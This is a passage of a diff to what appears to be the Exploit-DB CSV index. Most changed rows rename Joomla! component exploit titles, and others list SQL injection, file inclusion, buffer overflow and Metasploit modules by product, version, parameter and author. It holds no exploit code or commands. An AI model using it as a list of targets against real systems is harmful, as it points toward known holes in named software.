12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 -12432,platforms/php/webapps/12432.txt,"Joomla! Component JE Property Finder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0 +12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 @@ -11357,7 +11357,7 @@ id,file,description,date,author,platform,type,port 12437,platforms/windows/dos/12437.html,"Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 -12440,platforms/php/webapps/12440.txt,"Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 +12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps,0 @@ -11382,20 +11382,20 @@ id,file,description,date,author,platform,type,port 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 -12465,platforms/php/webapps/12465.txt,"Joomla! Component com_newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0 +12465,platforms/php/webapps/12465.txt,"Joomla! Component 'com_newsfeeds' - SQL Injection",2010-04-30,Archimonde,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0 12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0 12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit",2010-04-30,Lincoln,windows,local,0 12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps,0 12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0 -12473,platforms/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities",2010-05-01,Valentin,php,webapps,0 -12474,platforms/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0 +12473,platforms/php/webapps/12473.txt,"Joomla! Component 'Table JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0 +12474,platforms/php/webapps/12474.txt,"Joomla! Component 'Card View JX' - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 -12479,platforms/php/webapps/12479.txt,"Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 +12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 @@ -11447,7 +11447,7 @@ id,file,description,date,author,platform,type,port 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL Redirection",2010-05-08,ITSecTeam,php,webapps,0 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 -12539,platforms/php/webapps/12539.txt,"Joomla! Component com_articleman - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0 +12539,platforms/php/webapps/12539.txt,"Joomla! Component 'com_articleman' - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 @@ -11479,12 +11479,12 @@ id,file,description,date,author,platform,type,port 12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps,0 12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution",2010-05-11,"Krystian Kloskowski",windows,remote,0 -12574,platforms/php/webapps/12574.txt,"Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0 +12574,platforms/php/webapps/12574.txt,"Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0 12575,platforms/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps,0 12576,platforms/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,php,webapps,0 12577,platforms/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps,0 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 -12579,platforms/php/webapps/12579.txt,"Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0 +12579,platforms/php/webapps/12579.txt,"Joomla! Component 'com_PHP' 0.1 - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0 12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal / Listing",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 @@ -11494,50 +11494,50 @@ id,file,description,date,author,platform,type,port 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 -12590,platforms/php/webapps/12590.txt,"Joomla! Component com_konsultasi - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps,0 +12590,platforms/php/webapps/12590.txt,"Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 -12592,platforms/php/webapps/12592.txt,"Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 +12592,platforms/php/webapps/12592.txt,"Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0 -12594,platforms/php/webapps/12594.txt,"Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 -12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0 +12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 +12595,platforms/php/webapps/12595.txt,"Joomla! Component 'com_dioneformwizard' - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0 12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 -12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 +12601,platforms/php/webapps/12601.txt,"Joomla! Component 'com_jejob' 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0 12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0 -12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 +12607,platforms/php/webapps/12607.txt,"Joomla! Component 'com_jequoteform' - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0 -12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 +12611,platforms/php/webapps/12611.txt,"Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0 12614,platforms/windows/remote/12614.txt,"Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 -12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 +12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 -12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 +12618,platforms/php/webapps/12618.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0 -12623,platforms/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 +12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0 -12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0 -12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 +12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0 +12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0 12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0 12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0 12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0 -12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0 +12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0 12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0 12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0 12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,"cp77fk4r ",php,webapps,0 @@ -11546,7 +11546,7 @@ id,file,description,date,author,platform,type,port 12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0 -12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 +12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0 12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)",2010-05-18,JMIT,netbsd_x86,dos,0 @@ -11620,7 +11620,7 @@ id,file,description,date,author,platform,type,port 12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps,0 12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps,0 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 -12723,platforms/php/webapps/12723.py,"Joomla! Component com_qpersonel - SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0 +12723,platforms/php/webapps/12723.py,"Joomla! Component 'com_qpersonel' 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps,0 12724,platforms/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0 12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -14524,7 +14524,7 @@ id,file,description,date,author,platform,type,port 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 -16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 +16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21 @@ -16307,7 +16307,7 @@ id,file,description,date,author,platform,type,port 18832,platforms/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,php,webapps,0 18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 -18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86) - Code Execution",2012-05-11,0in,windows,local,0 +18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0 @@ -19448,7 +19448,7 @@ id,file,description,date,author,platform,type,port 22153,platforms/php/webapps/22153.pl,"Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 -22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 +22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 @@ -20918,7 +20918,7 @@ id,file,description,date,author,platform,type,port 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0 -23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0 +23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 @@ -30581,7 +30581,7 @@ id,file,description,date,author,platform,type,port 33880,platforms/windows/remote/33880.rb,"Cogent DataHub - Command Injection (Metasploit)",2014-06-25,Metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 -33998,platforms/php/webapps/33998.html,"Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 @@ -30723,12 +30723,12 @@ id,file,description,date,author,platform,type,port 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 -34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 -34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34003,platforms/php/webapps/34003.txt,"Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34004,platforms/php/webapps/34004.txt,"Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 -34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 +34008,platforms/php/webapps/34008.txt,"Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010 34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 @@ -30739,7 +30739,7 @@ id,file,description,date,author,platform,type,port 34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 -34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0 +34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' 